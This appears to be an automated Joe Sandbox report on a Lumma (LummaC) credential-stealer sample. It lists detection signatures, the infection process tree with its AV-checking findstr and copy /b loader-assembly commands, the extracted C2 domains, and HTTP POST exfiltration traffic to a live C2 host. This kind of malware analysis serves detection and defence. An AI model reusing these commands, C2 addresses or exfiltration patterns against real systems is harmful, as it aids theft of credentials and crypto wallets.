Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
80441fcf.exe

Overview

General Information

Sample name:80441fcf.exe
Analysis ID:1480529
MD5:d3c1c1a07fc43292e7e29e57c752d4c5
SHA1:378c2bf9ece8f5db60f56fda569d24c413d64b55
SHA256:80441fcf20760b653d36c4bc78c58c9e05b190e811767c7ed523a904e53b0684
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Search for Antivirus process
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 80441fcf.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\80441fcf.exe" MD5: D3C1C1A07FC43292E7E29E57C752D4C5)
    • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5960 cmdline: "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6656 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5892 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5036 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7128 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1120 cmdline: cmd /c md 5758 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 4476 cmdline: cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1264 cmdline: cmd /c copy /b Ink 5758\o MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Apply.pif (PID: 6488 cmdline: 5758\Apply.pif 5758\o MD5: 848164D084384C49937F99D5B894253E)
      • PING.EXE (PID: 3924 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "assumptionflattyou.shop"], "Build id": "HpOoIh--@Zakielk"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
      Process Memory Space: Apply.pif PID: 6488JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Apply.pif PID: 6488JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 5758\Apply.pif 5758\o, CommandLine: 5758\Apply.pif 5758\o, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: 5758\Apply.pif 5758\o, ProcessId: 6488, ProcessName: Apply.pif

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe", CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe", CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe", ProcessId: 5892, ProcessName: findstr.exe
            No Snort rule has matched
            Timestamp:2024-07-24T21:05:21.384801+0200
            SID:2048094
            Source Port:64747
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T21:05:14.060717+0200
            SID:2054653
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T21:05:15.361117+0200
            SID:2054653
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T21:05:16.915861+0200
            SID:2048094
            Source Port:49735
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 80441fcf.exeAvira: detected
            Source: technologyenterdo.shopAvira URL Cloud: Label: malware
            Source: https://assumptionflattyou.shop/apiAvira URL Cloud: Label: malware
            Source: associationokeo.shopAvira URL Cloud: Label: malware
            Source: turkeyunlikelyofw.shopAvira URL Cloud: Label: malware
            Source: detectordiscusser.shopAvira URL Cloud: Label: malware
            Source: https://assumptionflattyou.shop:443/apiAvira URL Cloud: Label: malware
            Source: 0000000C.00000002.2541661745.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "assumptionflattyou.shop"], "Build id": "HpOoIh--@Zakielk"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: associationokeo.shop
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: turkeyunlikelyofw.shop
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: pooreveningfuseor.pw
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: edurestunningcrackyow.fun
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: detectordiscusser.shop
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: problemregardybuiwo.fun
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: lighterepisodeheighte.fun
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: technologyenterdo.shop
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: assumptionflattyou.shop
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString decryptor: HpOoIh--@Zakielk
            Source: 80441fcf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64748 version: TLS 1.2
            Source: Binary string: Z:\7zsfxmm-cd920c2bb1fac536108acd5da87f93b5cd38e3fa\Output\Win32\7ZSfxMod.pdb source: 80441fcf.exe
            Source: Binary string: Z:\7zsfxmm-cd920c2bb1fac536108acd5da87f93b5cd38e3fa\Output\Win32\7ZSfxMod.pdbt?= source: 80441fcf.exe
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0040325A FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_0040325A
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00402B9F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,0_2_00402B9F
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00402CB4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_00402CB4
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BE1AC GetFileAttributesW,FindFirstFileW,FindClose,12_2_008BE1AC
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BD98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_008BD98E
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008CA29A FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_008CA29A
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C6406 FindFirstFileW,FindNextFileW,FindClose,12_2_008C6406
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0088C5F3 FindFirstFileExW,12_2_0088C5F3
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C70FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_008C70FE
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C705D FindFirstFileW,FindClose,12_2_008C705D
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BD65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_008BD65B
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C9DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_008C9DB1
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\CookbookJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\IncreasinglyJump to behavior

            Networking

            barindex
            Source: Malware configuration extractorURLs: associationokeo.shop
            Source: Malware configuration extractorURLs: turkeyunlikelyofw.shop
            Source: Malware configuration extractorURLs: pooreveningfuseor.pw
            Source: Malware configuration extractorURLs: edurestunningcrackyow.fun
            Source: Malware configuration extractorURLs: detectordiscusser.shop
            Source: Malware configuration extractorURLs: problemregardybuiwo.fun
            Source: Malware configuration extractorURLs: lighterepisodeheighte.fun
            Source: Malware configuration extractorURLs: technologyenterdo.shop
            Source: Malware configuration extractorURLs: assumptionflattyou.shop
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: assumptionflattyou.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: assumptionflattyou.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 13683Host: assumptionflattyou.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16226Host: assumptionflattyou.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20570Host: assumptionflattyou.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1270Host: assumptionflattyou.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 555626Host: assumptionflattyou.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008CD5B3 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_008CD5B3
            Source: global trafficDNS traffic detected: DNS query: qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGyd
            Source: global trafficDNS traffic detected: DNS query: assumptionflattyou.shop
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: assumptionflattyou.shop
            Source: 80441fcf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: 80441fcf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: 80441fcf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: 80441fcf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: 80441fcf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: 80441fcf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: 80441fcf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: 80441fcf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: 80441fcf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp, 80441fcf.exeString found in binary or memory: http://ocsp.digicert.com0
            Source: 80441fcf.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: 80441fcf.exeString found in binary or memory: http://ocsp.digicert.com0C
            Source: 80441fcf.exeString found in binary or memory: http://ocsp.digicert.com0X
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: Apply.pif, 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmp, Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: 80441fcf.exeString found in binary or memory: http://www.digicert.com/CPS0
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/
            Source: Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/4
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/Pa
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp, Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/api
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/apir
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/apis
            Source: Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/apiy
            Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop/os
            Source: Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assumptionflattyou.shop:443/api
            Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Apply.pif.10.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
